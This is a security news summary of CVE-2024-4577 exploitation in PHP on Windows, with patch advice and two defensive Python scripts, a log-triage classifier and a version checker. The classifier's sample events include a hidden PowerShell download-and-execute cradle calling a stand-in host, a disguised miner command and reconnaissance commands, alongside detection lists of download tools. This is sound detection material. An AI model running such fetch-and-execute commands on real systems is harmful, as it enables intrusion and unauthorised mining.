Hackers Exploit Severe PHP Flaw to Deploy Quasar RAT and XMRig Miners

Summary:
Threat actors are actively exploiting CVE-2024-4577, a severe argument injection vulnerability in PHP running on Windows in CGI mode, to deploy cryptocurrency miners and remote access trojans like Quasar RAT. The flaw allows remote attackers to execute arbitrary code on vulnerable systems, making it a high-priority target for cybercriminals.

According to Bitdefender, exploitation attempts have surged since late 2024, with most attacks targeting Taiwan, Hong Kong, Brazil, Japan, and India. Threat actors are using a range of techniques to leverage this vulnerability. Around 15% of the detected attempts are simple vulnerability checks, running commands likely intended only to confirm that a system is exploitable. Another 15% focus on system reconnaissance: gathering information about running processes, network configuration, domain and user details, and system metadata, steps that indicate preparation for a more advanced attack.

A significant portion of the attacks, at least 5%, culminate in the deployment of cryptocurrency miners, specifically XMRig. Some campaigns have also been observed installing NiceHash miners (NiceHash is a platform that lets users sell computing power for cryptocurrency), disguising the miner process as a legitimate application to avoid detection.
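The stages described above (exploitability check, reconnaissance, payload retrieval, miner execution) can be triaged from process-creation telemetry. The following is an added example, not code from the article or from Bitdefender: it classifies constructed Sysmon-style process-creation records, anchoring on php-cgi.exe as the parent process (exploitation of CVE-2024-4577 surfaces as php-cgi spawning a shell) and on miner command-line arguments rather than the binary name, since the text notes miners are disguised as legitimate applications. The sample events, hostnames and addresses are constructed for the example.

```python
import re
from collections import Counter

# Constructed sample process-creation events written for this example; they are
# not from the article or from Bitdefender's telemetry. Each line is a flattened
# key=value record in the style of a Sysmon Event ID 1 entry.
SAMPLE_EVENTS = [
    'ParentImage=C:\\php\\php-cgi.exe Image=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="cmd.exe /c echo 4f3a9c"',
    'ParentImage=C:\\php\\php-cgi.exe Image=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="cmd.exe /c whoami && tasklist && ipconfig /all && net user"',
    'ParentImage=C:\\php\\php-cgi.exe Image=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="cmd.exe /c nltest /dclist: && systeminfo"',
    'ParentImage=C:\\php\\php-cgi.exe '
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://203.0.113.10/s.ps1\')"',
    # Miner renamed to look like a system binary; only its arguments give it away.
    'ParentImage=C:\\ProgramData\\svchost.exe Image=C:\\ProgramData\\svchost.exe '
    'CommandLine="svchost.exe -o stratum+tcp://198.51.100.7:3333 -u 4Awallet --donate-level=0"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="cmd.exe /c ipconfig /all"',
]

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

CHECK_CMDS = {"echo", "ver"}
RECON_CMDS = {"whoami", "tasklist", "ipconfig", "net", "systeminfo", "netstat",
              "nltest", "quser", "wmic", "query"}
FETCH_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                 "certutil", "bitsadmin", "curl ")
MINER_MARKERS = ("stratum+tcp://", "stratum+ssl://", "--donate-level", "xmrig",
                 "nicehash")


def parse_event(line):
    """Turn one flattened key=value record into a dict (surrounding quotes stripped)."""
    return {k: v.strip('"') for k, v in KV.findall(line)}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    cmd = event.get("CommandLine", "").lower()
    # Pool/miner arguments are the signal regardless of parent process, because
    # the binary itself is often renamed to something innocuous.
    if any(m in cmd for m in MINER_MARKERS):
        return "miner"
    # Everything else is only attributed to exploitation when php-cgi.exe is the
    # parent: code execution via CVE-2024-4577 shows up as php-cgi spawning a shell.
    if _basename(event.get("ParentImage", "")) != "php-cgi.exe":
        return "unrelated"
    if any(m in cmd for m in FETCH_MARKERS):
        return "payload_fetch"
    words = set(re.findall(r"\b[a-z][a-z0-9-]*\b", cmd))
    if words & RECON_CMDS:
        return "recon"
    if words & CHECK_CMDS:
        return "check"
    return "other"


def triage(lines):
    """Count events per category; the shares mirror the breakdown in the text."""
    return Counter(classify(parse_event(line)) for line in lines)


if __name__ == "__main__":
    counts = triage(SAMPLE_EVENTS)
    related = sum(n for c, n in counts.items() if c != "unrelated")
    for cat, n in counts.most_common():
        pct = 100 * n / related if cat != "unrelated" else 0.0
        print(f"{cat:14s} {n:3d}  {pct:5.1f}% of php-cgi-related events")
```

The parent-process anchor is deliberately strict: a bare `ipconfig /all` from explorer.exe is ordinary administration, while the same command under php-cgi.exe is reconnaissance through the web server. The miner rule is deliberately loose in the other direction, matching on pool-protocol arguments so that a renamed XMRig or NiceHash binary is still caught.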

Suggested Corrections:
  • Users are advised to upgrade to the patched releases PHP 8.3.8, PHP 8.2.20, or PHP 8.1.29. Any earlier version should be considered vulnerable, especially branches that are no longer supported (PHP 8.0, PHP 7, and PHP 5), which will not receive a fix.
  • Devcore, which discovered the flaw, notes that CGI implementations are problematic because of their age, and recommends evaluating more secure architectures such as Mod-PHP, FastCGI, or PHP-FPM.
  • Since most campaigns rely on living-off-the-land (LOTL) tools, organizations should consider restricting tools such as PowerShell to privileged users such as administrators.
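For fleet triage against the fixed releases listed above, the following is an added example (not from the article, Devcore, or the PHP project). It compares versions as integer tuples rather than strings, handles the end-of-life branches that never received a fix, and only flags Windows CGI deployments, since that is the affected configuration. It assumes that branches newer than 8.3 were cut after the fix landed and therefore carry it; the `on_windows` and `cgi_sapi` flags are supplied by the caller from the host inventory and the SAPI reported by `php -v`.

```python
import re

# Fixed releases per supported branch, as listed in the corrections above.
# Branches older than 8.1 were end-of-life when the fix shipped and never got it.
FIXED_RELEASES = {(8, 3): (8, 3, 8), (8, 2): (8, 2, 20), (8, 1): (8, 1, 29)}
OLDEST_FIXED_BRANCH = min(FIXED_RELEASES)


def fmt(v):
    return ".".join(map(str, v))


def parse_version(text):
    """Pull MAJOR.MINOR.PATCH out of a bare version or `php -v` output.

    Comparing as a tuple of ints matters: as strings, "8.2.9" sorts after
    "8.2.20" and would wrongly look patched.
    """
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\b", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(x) for x in m.groups())


def assess(version_text, on_windows=True, cgi_sapi=True):
    """Return (vulnerable, reason) for CVE-2024-4577.

    The flaw only applies to PHP on Windows running as CGI, so the caller
    passes those two facts in; a Linux host or a PHP-FPM deployment on the
    same version is out of scope.
    """
    if not (on_windows and cgi_sapi):
        return False, "not a Windows CGI deployment; CVE-2024-4577 does not apply"
    v = parse_version(version_text)
    branch = v[:2]
    if branch in FIXED_RELEASES:
        fixed = FIXED_RELEASES[branch]
        if v >= fixed:
            return False, f"{fmt(v)} includes the fix ({fmt(fixed)})"
        return True, f"{fmt(v)} predates the fix; upgrade to {fmt(fixed)}"
    if branch < OLDEST_FIXED_BRANCH:
        return True, (f"{fmt(v)} is on an unsupported branch with no fix; "
                      "migrate to a supported branch")
    # Assumption (stated in the lead-in): branches newer than 8.3 were released
    # after the fix landed and already contain it.
    return False, f"{fmt(v)} is on a branch released after the fix"


if __name__ == "__main__":
    # Constructed inputs for the example, in the shape `php -v` prints.
    for sample in ("PHP 8.2.9 (cgi-fcgi) (built: Jan  1 2024)",
                   "PHP 8.3.8 (cgi-fcgi) (built: Jun  6 2024)",
                   "PHP 7.4.33 (cgi-fcgi)"):
        vulnerable, reason = assess(sample)
        print(f"{'VULNERABLE' if vulnerable else 'ok':10s} {reason}")
```

Version and SAPI alone do not settle the question for every host: a patched version is safe, but an unpatched one is only reachable if php-cgi.exe is actually wired into the web server, so pair this check with a configuration review rather than treating it as the final word.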

Link(s):
https://thehackernews.com/2025/03/hackers-exploit-severe-php-flaw-to.html